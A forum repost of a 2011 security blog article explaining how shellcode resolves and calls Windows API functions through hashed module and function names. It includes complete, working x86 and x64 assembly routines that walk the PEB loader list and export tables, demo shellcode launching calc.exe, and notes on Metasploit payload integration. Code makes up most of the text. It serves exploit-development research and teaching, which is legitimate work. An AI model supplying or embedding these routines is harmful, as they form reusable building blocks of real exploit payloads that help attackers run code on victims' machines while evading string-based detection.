Nytro, posted May 5, 2011

Calling API Functions

Introduction

An alternative approach for position-independent code, such as shellcode, to call Windows API functions is shown below. There are already many existing methods available, typically relying on parsing either the Import Address Table (IAT) or Export Address Table (EAT) of a specific module in order to locate the address of a required function. Some methods use a variation of the above in which the kernel32 module's EAT (or a module's IAT entry referencing kernel32) is parsed in order to locate the functions LoadLibraryA and GetProcAddress; these two functions are then used to resolve the remaining function addresses (as well as to load any modules not already present in the process's address space). If relying on GetProcAddress to resolve functions, the ASCII names of the functions must also be available, increasing the shellcode's size considerably. It is therefore common to use a hashing technique, typically based on the assembly rotate (ROR/ROL) instructions, in order to avoid this problem and create a more optimized solution.

The 2003 paper 'Understanding Windows Shellcode' by Skape[1] is an excellent read to understand the various techniques fully. A good example of a well optimized shellcode is SkyLined's w32-bind-ngs-shellcode[2].

An Alternative Approach

Another way to resolve function addresses is to use a hash that combines both the desired function name and its module name. The entire list of modules loaded in a process can be iterated over, calculating the respective hash value for each exported function and comparing it to the hash we are searching for. Once it is located we can proceed to resolve the function's address. Furthermore, we can wrap this functionality in a function which will act as a proxy, allowing the caller to indirectly call the desired API function.
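The combined hash can be sketched in Python. This is a minimal illustration, assuming the scheme used by the assembly listings later in this post: a rotate-right-by-13 additive hash over the module name as UTF-16LE bytes (null terminator included, lowercase bytes folded to uppercase), added to the same hash over the ASCII function name (null terminator included). The names `ror32`, `ror13_hash` and `api_hash` are chosen here for illustration and are not taken from the original source.

```python
def ror32(value, bits):
    """Rotate a 32-bit value right by the given number of bits."""
    value &= 0xFFFFFFFF
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF


def ror13_hash(data, fold_case=False):
    """Additive ROR-13 hash over a bytes object, truncated to 32 bits."""
    result = 0
    for byte in data:
        # Mirrors the 'cmp al, 'a' / jl / sub al, 0x20' sequence: the compare
        # is signed, so only bytes 0x61..0x7F are shifted down by 0x20.
        if fold_case and 0x61 <= byte <= 0x7F:
            byte -= 0x20
        result = (ror32(result, 13) + byte) & 0xFFFFFFFF
    return result


def api_hash(module, function):
    """Combine the module-name hash and the function-name hash."""
    # Module names are read from the loader data as a unicode string,
    # including the terminating null character.
    module_bytes = (module + "\x00").encode("utf-16-le")
    # Export names are ASCII and are hashed up to and including the null.
    function_bytes = (function + "\x00").encode("ascii")
    module_part = ror13_hash(module_bytes, fold_case=True)
    function_part = ror13_hash(function_bytes)
    return (module_part + function_part) & 0xFFFFFFFF


if __name__ == "__main__":
    # 0x876F8B31 is the WinExec hash pushed by the x86 example in this post.
    print(hex(api_hash("kernel32.dll", "WinExec")))  # 0x876f8b31
```

Because the module name is case-folded before hashing, `api_hash("KERNEL32.DLL", "WinExec")` gives the same value, which is why the same constants work regardless of how a given Windows version stores the module name.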
A pseudo x86 code example of using this technique is shown first below and, for comparison, a more traditional approach of achieving the same is shown second.

Using this technique:

  push param2                 ; push the second parameter
  push param1                 ; push the first parameter
  push hash                   ; push the hash of the function + module
  call api_call               ; resolve and indirectly call the desired function

A more traditional approach:

  push hash                   ; push the hash of the function + module
  push module_address         ; push the address of the module
  call resolve_api_address    ; resolve the desired function
  push param2                 ; push the second parameter
  push param1                 ; push the first parameter
  call api_address            ; directly call the desired function

We can see from the above that there are some advantages; namely, it takes only one call to both resolve and call any API function. We also do not need to keep track of any module base addresses.

All the source code shown below can be downloaded from this zip file CallingAPIFunctions.zip. Also included in the zip are the x86 and x64 versions of the eggtest application used to run and aid debugging of shellcode.

Implementation – Win32 x86

Listed below is a 137 byte implementation of the technique described above. This implementation works on all versions of 32-bit Windows (Windows 7, 2008, Vista, 2003, XP, 2000, NT4). It is implemented as a function called 'api_call'. Its parameters are the hash value of the desired API function to call, followed by all of the desired API function's parameters. It returns the result of indirectly calling the desired API function. The stdcall calling convention (used by nearly all Win32 API functions) is honored in that the EAX, ECX and EDX registers are expected to be clobbered while the remaining registers will not be clobbered.

[BITS 32]

api_call:
  pushad                      ; We preserve all the registers for the caller, bar EAX, ECX and EDX.
  mov ebp, esp                ; Create a new stack frame
  xor edx, edx                ; Zero EDX
  mov edx, [fs:edx+48]        ; Get a pointer to the PEB
  mov edx, [edx+12]           ; Get PEB->Ldr
  mov edx, [edx+20]           ; Get the first module from the InMemoryOrder module list
next_mod:
  mov esi, [edx+40]           ; Get pointer to the module's name (unicode string)
  movzx ecx, word [edx+38]    ; Set ECX to the length we want to check
  xor edi, edi                ; Clear EDI which will store the hash of the module name
loop_modname:
  xor eax, eax                ; Clear EAX
  lodsb                       ; Read in the next byte of the name
  cmp al, 'a'                 ; Some versions of Windows use lower case module names
  jl not_lowercase            ;
  sub al, 0x20                ; If so normalise to uppercase
not_lowercase:
  ror edi, 13                 ; Rotate right our hash value
  add edi, eax                ; Add the next byte of the name
  loop loop_modname           ; Loop until we have read enough
  ; We now have the module hash computed
  push edx                    ; Save the current position in the module list for later
  push edi                    ; Save the current module hash for later
  ; Proceed to iterate the export address table
  mov edx, [edx+16]           ; Get this module's base address
  mov eax, [edx+60]           ; Get PE header
  add eax, edx                ; Add the module's base address
  mov eax, [eax+120]          ; Get the export table's RVA
  test eax, eax               ; Test if no export address table is present
  jz get_next_mod1            ; If no EAT present, process the next module
  add eax, edx                ; Add the module's base address
  push eax                    ; Save the current module's EAT
  mov ecx, [eax+24]           ; Get the number of function names
  mov ebx, [eax+32]           ; Get the RVA of the function names
  add ebx, edx                ; Add the module's base address
  ; Computing the module hash + function hash
get_next_func:
  jecxz get_next_mod          ; When we reach the start of the EAT (we search backwards), process the next module
  dec ecx                     ; Decrement the function name counter
  mov esi, [ebx+ecx*4]        ; Get the RVA of the next function name
  add esi, edx                ; Add the module's base address
  xor edi, edi                ; Clear EDI which will store the hash of the function name
  ; And compare it to the one we want
loop_funcname:
  xor eax, eax                ; Clear EAX
  lodsb                       ; Read in the next byte of the ASCII function name
  ror edi, 13                 ; Rotate right our hash value
  add edi, eax                ; Add the next byte of the name
  cmp al, ah                  ; Compare AL (the next byte from the name) to AH (null)
  jne loop_funcname           ; If we have not reached the null terminator, continue
  add edi, [ebp-8]            ; Add the current module hash to the function hash
  cmp edi, [ebp+36]           ; Compare the hash to the one we are searching for
  jnz get_next_func           ; Go compute the next function hash if we have not found it
  ; If found, fix up the stack and call the function; otherwise compute the next one...
  pop eax                     ; Restore the current module's EAT
  mov ebx, [eax+36]           ; Get the ordinal table RVA
  add ebx, edx                ; Add the module's base address
  mov cx, [ebx+2*ecx]         ; Get the desired function's ordinal
  mov ebx, [eax+28]           ; Get the function addresses table RVA
  add ebx, edx                ; Add the module's base address
  mov eax, [ebx+4*ecx]        ; Get the desired function's RVA
  add eax, edx                ; Add the module's base address to get the function's actual VA
  ; We now fix up the stack and perform the call to the desired function...
finish:
  mov [esp+36], eax           ; Overwrite the old EAX value with the desired API address for the upcoming popad
  pop ebx                     ; Clear off the current module's hash
  pop ebx                     ; Clear off the current position in the module list
  popad                       ; Restore all of the caller's registers, bar EAX, ECX and EDX which are clobbered
  pop ecx                     ; Pop off the original return address our caller will have pushed
  pop edx                     ; Pop off the hash value our caller will have pushed
  push ecx                    ; Push back the correct return address
  jmp eax                     ; Jump into the required function
  ; We now automagically return to the correct caller...
get_next_mod:
  pop eax                     ; Pop off the current (now the previous) module's EAT
get_next_mod1:
  pop edi                     ; Pop off the current (now the previous) module's hash
  pop edx                     ; Restore our position in the module list
  mov edx, [edx]              ; Get the next module
  jmp short next_mod          ; Process this module

Example - Win32 x86

Using
the implementation given above (and assuming it has been saved to a file called 'x86_api_call.asm'), we can build a simple example which will execute the calc program and then terminate the process.

[BITS 32]
[ORG 0]

  cld                         ; clear the direction flag
  call start                  ; call start, this pushes the address of 'api_call' onto the stack
delta:
%include "./x86_api_call.asm"
start:
  pop ebp                     ; pop off the address of 'api_call' for calling later
  push byte +1                ; push the command show parameter
  lea eax, [ebp+command-delta] ; calculate an address to the command line
  push eax                    ; push the command line parameter
  push 0x876F8B31             ; push the hash value for WinExec
  call ebp                    ; kernel32.dll!WinExec( &command, SW_NORMAL )
  push byte 0                 ; push the desired exit code parameter
  push 0x56A2B5F0             ; push the hash value for ExitProcess
  call ebp                    ; call kernel32.dll!ExitProcess( 0 )
command:
  db "calc.exe", 0

We can build the above example using the NASM assembler[4] with the command:

>nasm -f bin -O3 -o x86_example.bin x86_example.asm

We can run the example with the eggtest program (included in the zip file):

>eggtest_x86.exe x86_example.bin

Implementation - Win64 x64

We can of course use the same technique on 64-bit Windows. Listed below is a 192 byte implementation of the technique described above for the x64 architecture. As before, it is implemented as a function called 'api_call'. The Win64 API uses quite a different calling convention[3] to that of the Win32 API. The first four parameters to any function are passed in via the registers RCX, RDX, R8 and R9 respectively, with any remaining parameters being pushed onto the stack (there are exceptions to this convention for floating point parameters). Another notable difference when coding for Win64 is that the Process Environment Block (PEB) must be retrieved from gs:96 as opposed to fs:48 on Win32. The desired function's hash value is passed in via register R10 in order to allow the registers RCX, RDX, R8 and R9 to be used for the desired function's parameters.
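As a reading aid, the structure offsets that the x86 and x64 listings in this post use can be put side by side. The sketch below only restates constants that appear in those listings; the key names (`peb`, `ldr`, and so on) and the helper `differing_offsets` are labels invented here for illustration, not identifiers from the original source.

```python
# Offsets exactly as they appear in the two api_call listings in this post.
# Key names are illustrative labels chosen for this sketch.
OFFSETS = {
    "x86": {
        "peb": 48,                   # [fs:48]
        "ldr": 12,                   # PEB->Ldr
        "in_memory_order_list": 20,  # first entry of the InMemoryOrder list
        "module_name_ptr": 40,       # pointer to the unicode module name
        "module_name_len": 38,       # length (in bytes) to hash
        "module_base": 16,           # module base address
        "pe_header": 60,             # offset of the PE header
        "export_table_rva": 120,     # export table RVA within the PE header
    },
    "x64": {
        "peb": 96,                   # [gs:96]
        "ldr": 24,
        "in_memory_order_list": 32,
        "module_name_ptr": 80,
        "module_name_len": 74,
        "module_base": 32,
        "pe_header": 60,
        "export_table_rva": 136,
    },
}

# Offsets inside the export table are the same in both listings.
EXPORT_TABLE = {
    "number_of_names": 24,
    "function_names_rva": 32,
    "ordinal_table_rva": 36,
    "function_addresses_rva": 28,
}


def differing_offsets():
    """Return the labels whose offsets differ between the two listings."""
    x86, x64 = OFFSETS["x86"], OFFSETS["x64"]
    return sorted(name for name in x86 if x86[name] != x64[name])


if __name__ == "__main__":
    for name in differing_offsets():
        print(name, OFFSETS["x86"][name], OFFSETS["x64"][name])
```

Only the loader and PE header offsets change with pointer size; the export table layout and the hashing itself are identical on both architectures.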
We can note that the hash values used do not need to be changed between architectures.

[BITS 64]

api_call:
  push r9                     ; Save the 4th parameter
  push r8                     ; Save the 3rd parameter
  push rdx                    ; Save the 2nd parameter
  push rcx                    ; Save the 1st parameter
  push rsi                    ; Save RSI
  xor rdx, rdx                ; Zero RDX
  mov rdx, [gs:rdx+96]        ; Get a pointer to the PEB
  mov rdx, [rdx+24]           ; Get PEB->Ldr
  mov rdx, [rdx+32]           ; Get the first module from the InMemoryOrder module list
next_mod:
  mov rsi, [rdx+80]           ; Get pointer to the module's name (unicode string)
  movzx rcx, word [rdx+74]    ; Set RCX to the length we want to check
  xor r9, r9                  ; Clear R9 which will store the hash of the module name
loop_modname:
  xor rax, rax                ; Clear RAX
  lodsb                       ; Read in the next byte of the name
  cmp al, 'a'                 ; Some versions of Windows use lower case module names
  jl not_lowercase            ;
  sub al, 0x20                ; If so normalise to uppercase
not_lowercase:
  ror r9d, 13                 ; Rotate right our hash value
  add r9d, eax                ; Add the next byte of the name
  loop loop_modname           ; Loop until we have read enough
  ; We now have the module hash computed
  push rdx                    ; Save the current position in the module list for later
  push r9                     ; Save the current module hash for later
  ; Proceed to iterate the export address table
  mov rdx, [rdx+32]           ; Get this module's base address
  mov eax, dword [rdx+60]     ; Get PE header
  add rax, rdx                ; Add the module's base address
  mov eax, dword [rax+136]    ; Get the export table's RVA
  test rax, rax               ; Test if no export address table is present
  jz get_next_mod1            ; If no EAT present, process the next module
  add rax, rdx                ; Add the module's base address
  push rax                    ; Save the current module's EAT
  mov ecx, dword [rax+24]     ; Get the number of function names
  mov r8d, dword [rax+32]     ; Get the RVA of the function names
  add r8, rdx                 ; Add the module's base address
  ; Computing the module hash + function hash
get_next_func:
  jrcxz get_next_mod          ; When we reach the start of the EAT (we search backwards), process the next module
  dec rcx                     ; Decrement the function name counter
  mov esi, dword [r8+rcx*4]   ; Get the RVA of the next function name
  add rsi, rdx                ; Add the module's base address
  xor r9, r9                  ; Clear R9 which will store the hash of the function name
  ; And compare it to the one we want
loop_funcname:
  xor rax, rax                ; Clear RAX
  lodsb                       ; Read in the next byte of the ASCII function name
  ror r9d, 13                 ; Rotate right our hash value
  add r9d, eax                ; Add the next byte of the name
  cmp al, ah                  ; Compare AL (the next byte from the name) to AH (null)
  jne loop_funcname           ; If we have not reached the null terminator, continue
  add r9, [rsp+8]             ; Add the current module hash to the function hash
  cmp r9d, r10d               ; Compare the hash to the one we are searching for
  jnz get_next_func           ; Go compute the next function hash if we have not found it
  ; If found, fix up the stack and call the function; otherwise compute the next one...
  pop rax                     ; Restore the current module's EAT
  mov r8d, dword [rax+36]     ; Get the ordinal table RVA
  add r8, rdx                 ; Add the module's base address
  mov cx, [r8+2*rcx]          ; Get the desired function's ordinal
  mov r8d, dword [rax+28]     ; Get the function addresses table RVA
  add r8, rdx                 ; Add the module's base address
  mov eax, dword [r8+4*rcx]   ; Get the desired function's RVA
  add rax, rdx                ; Add the module's base address to get the function's actual VA
  ; We now fix up the stack and perform the call to the desired function...
finish:
  pop r8                      ; Clear off the current module's hash
  pop r8                      ; Clear off the current position in the module list
  pop rsi                     ; Restore RSI
  pop rcx                     ; Restore the 1st parameter
  pop rdx                     ; Restore the 2nd parameter
  pop r8                      ; Restore the 3rd parameter
  pop r9                      ; Restore the 4th parameter
  pop r10                     ; Pop off the return address
  sub rsp, 32                 ; Reserve space for the four register params (4 * sizeof(QWORD) = 32)
  ; It is the caller's responsibility to restore RSP if need be (or alloc more space or align RSP).
  push r10                    ; Push back the return address
  jmp rax                     ; Jump into the required function
  ; We now automagically return to the correct caller...
get_next_mod:
  pop rax                     ; Pop off the current (now the previous) module's EAT
get_next_mod1:
  pop r9                      ; Pop off the current (now the previous) module's hash
  pop rdx                     ; Restore our position in the module list
  mov rdx, [rdx]              ; Get the next module
  jmp next_mod                ; Process this module

Example - Win64 x64

Using the x64 implementation given above (and assuming it has been saved to a file called 'x64_api_call.asm'), we can build another simple example which will execute the calc program and then terminate the process.

[BITS 64]
[ORG 0]

  cld                         ; clear the direction flag
  and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned
  call start                  ; call start, this pushes the address of 'api_call' onto the stack
delta:
%include "./x64_api_call.asm"
start:
  pop rbp                     ; pop off the address of 'api_call' for calling later
  mov rdx, 1                  ; param 2 is the command show parameter
  lea rcx, [rbp+command-delta] ; param 1 is the address to the command line
  mov r10d, 0x876F8B31        ; R10 = the hash value for WinExec
  call rbp                    ; WinExec( &command, 1 );
  mov rcx, 0                  ; set the exit function parameter
  mov r10d, 0x6F721347        ; R10 = the hash value for RtlExitUserThread
  call rbp                    ; call ntdll.dll!RtlExitUserThread( 0 )
command:
  db "calc.exe", 0

We can build the above example using the NASM assembler with the command:

>nasm -f bin -O3 -o x64_example.bin x64_example.asm

We can run the example with the eggtest program (included in the zip file):

>eggtest_x64.exe x64_example.bin

Forwarded Exports

Modules may contain entries in their EAT which are actually forwarded entries[5]. This means that instead of a module's export resolving to a function within that module, the export is intended to resolve to a function within another module. For example, on Windows Vista, 2008 and 7 the export kernel32.dll!ExitThread is a forwarded export that points to ntdll.dll!RtlExitUserThread.
This is achieved by having the respective EAT entry refer to an ASCII string naming the module and function that the forwarded export points to (instead of holding the RVA of a function). I am unaware of any shellcode implementations that attempt to resolve forwarded exports correctly (unless using kernel32.dll!GetProcAddress) and the implementation given above does not resolve forwarded exports either. It gets awkward quickly, as you must first recognize that the export is a forwarded one, then use LoadLibraryA to load the forwarded module (in order to retrieve its base address, and to load it into the process's address space if it is not already present) and then use GetProcAddress to resolve the forwarded function based on the ASCII function name given.

For typical shellcodes the only required function which is a forwarded export is ExitThread, as mentioned above. A workaround for this problem is to check the current Windows platform at run time and call the appropriate function to avoid calling a forwarded export, as shown in the Win32 snippet below:

exitfunk:
  mov ebx, 0x0A2A1DE0         ; The EXITFUNK as patched in by the user...
  push 0x9DBD95A6             ; hash( "kernel32.dll", "GetVersion" )
  call ebp                    ; GetVersion(); (AL will = major version and AH will = minor version)
  cmp al, byte 6              ; If we are not running on Windows Vista, 2008 or 7
  jl short goodbye            ; Then just call the exit function...
  cmp bl, 0xE0                ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
  jne short goodbye           ;
  mov ebx, 0x6F721347         ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
goodbye:                      ; We now perform the actual call to the exit function
  push byte 0                 ; push the exit function parameter
  push ebx                    ; push the hash of the exit function
  call ebp                    ; call EXITFUNK( 0 );

Hash Collisions

An obvious concern when using hash values in the manner described here is the occurrence of collisions between the hash of the function you are searching for and an arbitrary function in an arbitrary module which computes to the same hash value. To help determine the likelihood of this, a simple python script can be used to scan all modules on a system, computing the hashes of their exported functions and detecting if a collision occurs against any predefined functions (e.g. common functions we might need to use such as kernel32.dll!WinExec or ws2_32!recv). The python script is included in the zip file (see the start of this post) and uses the pefile package[6] to process a module's exports. This script has been run on multiple systems (Windows 7 RC1, 2008 SP1, Vista SP2, 2003 SP2, XP SP3, 2000 SP4 and NT4 SP6a), processing a total of 1,864,417 functions across 35,178 modules, and detected no collisions against the functions defined (please see the python script for more details).

Metasploit Integration

The majority of the Metasploit[7] x86 Windows payloads have been rewritten using the techniques presented here in order to bring Windows 7 and backwards compatibility to the stagers, stages and singles, as well as considerable size reductions for the stagers and stages.
Work on x64 payloads is under way.

References

[1] http://hick.org/code/skape/papers/win32-shellcode.pdf
[2] w32-bind-ngs-shellcode - 211 byte null-free 32-bit Windows port-binding shellcode (all OS/SPs) - Google Project Hosting
[3] Calling Convention
[4] The Netwide Assembler | Download The Netwide Assembler software for free at SourceForge.net
[5] Inside Windows: An In-Depth Look into the Win32 Portable Executable File Format, Part 2
[6] pefile - pefile is a Python module to read and work with PE (Portable Executable) files - Google Project Hosting
[7] Metasploit Framework Penetration Testing Software | Metasploit Project

Source: Harmony Security : Blog